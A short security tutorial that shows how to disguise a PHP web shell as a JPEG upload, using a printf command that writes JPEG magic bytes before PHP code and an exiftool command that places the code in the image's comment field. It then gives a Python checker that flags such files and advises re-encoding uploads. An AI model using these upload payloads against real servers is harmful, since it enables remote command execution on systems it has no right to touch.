Web Shell

If you can upload a jpg file, it is possible to hide a webshell in it.

A JPEG file is identified by its first bytes, which have the value ffd8ffe0.
To generate a file that will be identified as having a valid JPEG header:

printf "\xff\xd8\xff\xe0<?php system('id'); ?>" > webshell.jpg

This file will be recognized as a jpg file:

$ file webshell.jpg 
webshell.jpg: JPEG image data

An image file contains a lot of information: shooting date, location, camera type...
We can inject PHP code into this data.

exiftool -Comment="<?php system('id'); ?>" webshell.jpg
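
An upload handler that only checks the first bytes, as file does above, accepts both of these files. The Python check below is an added example, not part of the original page: it walks the JPEG segment structure instead of trusting the header and flags PHP open tags in the file and in its metadata segments. The function names, the constructed sample bytes and the strict "file must end with EOI" rule are assumptions made for the illustration.

```python
import struct

PHP_TAGS = (b"<?php", b"<?=")

def inspect_jpeg(data: bytes) -> list[str]:
    """Walk JPEG segments; return findings (empty list = nothing suspicious)."""
    findings = []
    if data[:2] != b"\xff\xd8":
        return ["no SOI marker at offset 0"]
    if b"<?php" in data.lower():
        findings.append("PHP open tag present in file")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            findings.append(f"offset {pos}: expected segment marker")
            return findings
        marker = data[pos + 1]
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        end = pos + 2 + length  # the length field counts its own two bytes
        if length < 2 or end > len(data):
            findings.append(f"offset {pos}: segment 0x{marker:02x} has an invalid length")
            return findings
        payload = data[pos + 4:end].lower()
        is_meta = marker == 0xFE or 0xE0 <= marker <= 0xEF  # COM or APPn
        if is_meta and any(tag in payload for tag in PHP_TAGS):
            findings.append(f"offset {pos}: script tag in metadata segment 0x{marker:02x}")
        if marker == 0xDA:  # SOS: entropy-coded data follows until EOI
            if not data.endswith(b"\xff\xd9"):
                findings.append("no EOI marker at end of file")
            return findings
        pos = end
    findings.append("no SOS segment: header without image data")
    return findings

def seg(marker: int, payload: bytes) -> bytes:
    """Build one JPEG segment (helper for the constructed samples)."""
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload

# Constructed samples: structurally valid skeletons, not decodable images.
JFIF = seg(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
SCAN = seg(0xDA, b"\x01\x01\x00\x00\x3f\x00") + b"\x00" * 8 + b"\xff\xd9"
CLEAN = b"\xff\xd8" + JFIF + SCAN
HEADER_ONLY = b"\xff\xd8\xff\xe0<?php system('id'); ?>"  # the printf file above
IN_COMMENT = b"\xff\xd8" + JFIF + seg(0xFE, b"<?php system('id'); ?>") + SCAN

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("header-only", HEADER_ONLY), ("comment", IN_COMMENT)):
        print(name, inspect_jpeg(sample))
```

A structural check like this does not prove that the image decodes. Re-encoding uploads with an image library and serving them from a location where PHP is never executed remain the stronger controls.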